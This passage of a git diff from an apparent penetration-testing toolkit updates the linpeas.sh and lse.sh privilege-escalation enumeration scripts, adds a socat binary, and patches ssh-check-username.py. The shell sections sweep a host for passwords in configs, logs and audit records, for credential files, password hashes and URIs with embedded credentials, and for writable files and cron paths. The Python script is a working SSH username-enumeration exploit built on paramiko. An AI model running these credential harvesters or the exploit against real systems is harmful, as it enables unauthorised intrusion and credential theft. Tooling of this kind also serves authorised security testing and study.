-n 70 + print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" + find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 echo "" ##-- IF) Readable files in /tmp, /var/tmp, bachups - printf $Y"[+] "$GREEN"Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)\n"$NC + print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" filstmpback=`find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70` printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done echo "" ##-- IF) Interesting writable files by ownership or all if ! [ "$IAMROOT" ]; then - printf $Y"[+] "$GREEN"Interesting writable files owned by me or writable by everyone (not in Home) (max 500)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files\n"$NC + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all obmowbe=`find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` printf "%s\n" "$obmowbe" | while read entry; do if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; - elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then - echo "$entry" | sed -${E} "s,$writeVB,${C}[1;31;103m&${C}[0m," + elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else - echo "$entry" | sed -${E} "s,$writeB,${C}[1;31m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," fi done echo "" @@ -3275,17 +3163,17 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Interesting writable files by group if ! [ "$IAMROOT" ]; then - printf $Y"[+] "$GREEN"Interesting GROUP writable files (not in Home) (max 500)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files\n"$NC - for g in `groups`; do - printf " Group "$GREEN"$g:\n"$NC; + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in `groups`; do + printf " Group "$GREEN"$g:\n"$NC; iwfbg=`find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` printf "%s\n" "$iwfbg" | while read entry; do if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; - elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then - echo "$entry" | sed -${E} "s,$writeVB,${C}[1;31;103m&${C}[0m," + elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else - echo "$entry" | sed -${E} "s,$writeB,${C}[1;31m&${C}[0m," + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," fi done done @@ -3293,73 +3181,72 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then fi ##-- IF) Passwords in config PHP files - printf $Y"[+] "$GREEN"Searching passwords in config PHP files\n"$NC - configs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '.*config.*\.php|database.php|db.php|storage.php|settings.php') - printf "%s\n" "$configs" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $c 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${C}[1;31m&${C}[0m,g"; done + print_2title "Searching passwords in config PHP files" + printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $c 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done echo "" ##-- IF) TTY passwords - printf $Y"[+] "$GREEN"Checking for TTY (sudo/su) passwords in audit logs\n"$NC - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${C}[1;31m&${C}[0m,g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${C}[1;31m&${C}[0m,g" | sed -${E} "s,data=.*,${C}[1;31m&${C}[0m,g" + print_2title "Checking for TTY (sudo/su) passwords in audit logs" + aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" + find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" echo "" ##-- IF) IPs inside logs - printf $Y"[+] "$GREEN"Finding IPs inside logs (limit 70)\n"$NC + print_2title "Finding IPs inside logs (limit 70)" (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 echo "" ##-- IF) Passwords inside logs - printf $Y"[+] "$GREEN"Finding passwords inside logs (limit 70)\n"$NC - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${C}[1;31m&${C}[0m," + print_2title "Finding passwords inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," echo "" ##-- IF) Emails inside logs - printf $Y"[+] "$GREEN"Finding emails inside logs (limit 70)\n"$NC - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${C}[1;32m&${C}[0m,g" - echo "" + print_2title "Finding emails inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" + echo "" ##-- IF) Passwords files in home - printf $Y"[+] "$GREEN"Finding *password* or *credential* files in home (limit 70)\n"$NC - (echo "$FIND_HOME $FIND_USR" | grep -E '.*password.*|.*credential.*|creds.*' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${C}[1;31m&${C}[0m," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found + print_2title "Finding *password* or *credential* files in home (limit 70)" + (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found echo "" if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Find possible files with passwords - printf $Y"[+] "$GREEN"Finding passwords inside key folders (limit 70) - only PHP files\n"$NC + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" intpwdfiles=`timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $HOMESEARCH /var/www /usr/local/www/ $backup_folders_row /tmp /etc /root /mnt /Users /private 2>/dev/null` - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g" + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" echo "" - printf $Y"[+] "$GREEN"Finding passwords inside key folders (limit 70) - no PHP files\n"$NC - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g" + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" echo "" ##-- IF) Find possible files with passwords - printf $Y"[+] "$GREEN"Finding possible password variables inside key folders (limit 140)\n"$NC - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables2,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables3,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables4,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables5,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables6,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables7,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables8,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables9,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables10,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables11,${C}[1;31m&${C}[0m,g" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables2,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables3,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables4,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables5,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables6,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables7,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables8,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables9,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables10,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables11,${C}[1;31m&${C}[0m,g" + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" echo "" ##-- IF) Find possible conf files with passwords - printf $Y"[+] "$GREEN"Finding possible password in config files\n"$NC + print_2title "Finding possible password in config files" ppicf=`find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null` printf "%s\n" "$ppicf" | while read f; do if [ "`grep -EiI 'passwd.*|creden.*' \"$f\" 2>/dev/null`" ]; then echo $ITALIC" $f"$NC - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${C}[1;31m&${C}[0m,g" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" fi done echo "" ##-- IF) Find possible files with usernames - printf $Y"[+] "$GREEN"Finding 'username' string inside key folders (limit 70)\n"$NC - timeout 150 grep -RiIE "username.*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g" + print_2title "Finding 'username' string inside key folders (limit 70)" + timeout 150 grep -RiIE "username.*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" echo "" ##-- IF) Specific hashes inside files - printf $Y"[+] "$GREEN"Searching specific hashes inside files - less false positives (limit 70)\n"$NC + print_2title "Searching specific hashes inside files - less false positives (limit 70)" regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' @@ -3369,24 +3256,24 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${C}[1;31m&${C}[0m," + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," echo "" fi if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Specific hashes inside files - printf $Y"[+] "$GREEN"Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)\n"$NC + print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${C}[1;31m&${C}[0m," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," echo "" fi - + if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then ##-- IF) Find URIs with user:password@hoststrings - printf $Y"[+] "$GREEN"Finding URIs with user:password@host inside key folders\n"$NC + print_2title "Finding URIs with user:password@host inside key folders" timeout 150 find /var/www $backup_folders_row /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" timeout 150 grep -RiIE "://(.+):(.+)@" $HOMESEARCH 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" @@ -3396,4 +3283,4 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" echo "" fi -fi +fi \ No newline at end of file diff --git a/lse.sh b/lse.sh index 413717e..04a0cdd 100755 --- a/lse.sh +++ b/lse.sh @@ -4,8 +4,8 @@ # Author: Diego Blanco # GitHub: https://github.com/diego-treitos/linux-smart-enumeration -# -lse_version="3.2" +# +lse_version="3.3" #( Colors # @@ -287,7 +287,7 @@ lse_set_level() { esac } lse_help() { - echo "Use: $0 [options]" + echo "Use: $0 [options]" echo echo " OPTIONS" echo " -c Disable color" @@ -404,7 +404,7 @@ lse_test() { cecho "${red}---$reset\n" fi return 1 - fi + fi # If level is 2 and lse_level is less than 2, then we do not execute # level 2 tests unless their output needs to be assigned to a variable @@ -534,7 +534,7 @@ lse_exit() { } lse_procmon() { # monitor processes - #NOTE: The first number will be the number of occurrences of a process due to + #NOTE: The first number will be the number of occurrences of a process due to # uniq -c while [ -f "$lse_procmon_lock" ]; do ps -ewwwo start_time,pid,user:50,args @@ -564,7 +564,7 @@ lse_proc_print() { # A successful test will receive some output while a failed tests will receive # an empty string. # -########################################################################( users +########################################################################( users lse_run_tests_users() { lse_header "usr" "users" @@ -582,8 +582,8 @@ lse_run_tests_users() { #other users in an administrative group lse_test "usr020" "1" \ - "Are there other users in an administrative groups?" \ - 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$" | grep $lse_grep_opts -Ei ":[a-z_-]+\$"' + "Are there other users in administrative groups?" \ + 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$|:$lse_user$" | grep $lse_grep_opts -Ei ":[,a-z_-]+\$"' #other users with shell lse_test "usr030" "1" \ @@ -591,7 +591,7 @@ lse_run_tests_users() { 'grep $lse_grep_opts -E ":/[a-z/]+sh\$" /etc/passwd' \ "" \ "lse_shell_users" - + #user env information lse_test "usr040" "2" \ "Environment information" \ @@ -722,7 +722,7 @@ lse_run_tests_filesystem() { "Can we write to any setgid binary?" \ 'for b in $lse_setgid_binaries; do [ -x "$b" ] && [ -w "$b" ] && echo "$b" ;done' \ "fst040" - + #can we read /root lse_test "fst070" "1" \ "Can we read /root?" \ @@ -863,7 +863,7 @@ lse_run_tests_system() { lse_test "sys050" "1" \ "Can root user log in via SSH?" \ 'grep -E "^[[:space:]]*PermitRootLogin " /etc/ssh/sshd_config | grep -E "(yes|without-password|prohibit-password)"' - + #list available shells lse_test "sys060" "2" \ "List available shells" \ @@ -919,7 +919,7 @@ lse_run_tests_security() { "Does current user have capabilities?" \ 'printf "$lse_user_caps\n" | grep "$lse_user"' \ "sec040" - + #can user read the auditd log lse_test "sec060" "0" \ "Can we read the auditd log?" \ @@ -927,7 +927,7 @@ lse_run_tests_security() { } -##############################################################( recurrent tasks +##############################################################( recurrent tasks lse_run_tests_recurrent_tasks() { lse_header "ret" "recurrent tasks" @@ -960,7 +960,7 @@ lse_run_tests_recurrent_tasks() { #can we write to any paths present in cron tasks? lse_test "ret050" "1" \ "Can we write to any paths present in cron jobs" \ - 'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | sort -u`; do [ -w "$p" ] && echo "$p"; done' \ + 'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | grep -Ev "/dev/(null|zero|random|urandom)" | sort -u`; do [ -w "$p" ] && echo "$p"; done' \ "" \ "lse_user_writable_cron_paths" @@ -980,7 +980,7 @@ lse_run_tests_recurrent_tasks() { #user timers lse_test "ret500" "1" \ "User systemd timers" \ - 'systemctl --user list-timers --all | grep -Ev "(^$|timers listed)"' + 'systemctl --user list-timers --all | grep -iq "\.timer" && systemctl --user list-timers --all' #can we write in any system timer? lse_test "ret510" "0" \ @@ -1026,7 +1026,7 @@ lse_run_tests_network() { #nameservers lse_test "net530" "2" \ - "Namerservers" \ + "Nameservers" \ 'grep "nameserver" /etc/resolv.conf' #systemd nameservers @@ -1038,7 +1038,7 @@ lse_run_tests_network() { lse_test "net550" "2" \ "Listening TCP" \ 'netstat -tnlp || ss -tnlp' - + #listening UDP lse_test "net560" "2" \ "Listening UDP" \ @@ -1187,7 +1187,7 @@ lse_run_tests_software() { #check if there are ssh private keys in ssh-agent lse_test "sof050" "0" \ "Are there private keys in ssh-agent?" \ - 'ssh-add -l' + 'ssh-add -l | grep -iv "agent has no identities"' #check if there are gpg keys in gpg-agent lse_test "sof060" "0" \ diff --git a/socat b/socat new file mode 100644 index 0000000..ddb9097 Binary files /dev/null and b/socat differ diff --git a/ssh-check-username.py b/ssh-check-username.py index e246540..95d8676 100755 --- a/ssh-check-username.py +++ b/ssh-check-username.py @@ -26,9 +26,7 @@ class InvalidUsername(Exception): def add_boolean(*args, **kwargs): pass - -old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[ - paramiko.common.MSG_SERVICE_ACCEPT] +old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] def service_accept(*args, **kwargs): paramiko.message.Message.add_boolean = add_boolean @@ -55,14 +53,14 @@ def _paramiko_tunnel(username, *args, **kwargs): return try: transport.auth_publickey(us, paramiko.RSAKey.generate(2048)) - except InvalidUsername: + except InvalidUsername or socket.error: print ('[*] {} - Invalid username'.format(us)) except paramiko.ssh_exception.AuthenticationException: print ('[+] {} - Valid username'.format(us)) return -paramiko.auth_handler.AuthHandler._handler_table.update({ +paramiko.auth_handler.AuthHandler._client_handler_table.update({ paramiko.common.MSG_SERVICE_ACCEPT: service_accept, paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure }) @@ -81,7 +79,3 @@ if args.wordlist is not None: for u in f: usernames.append(u) 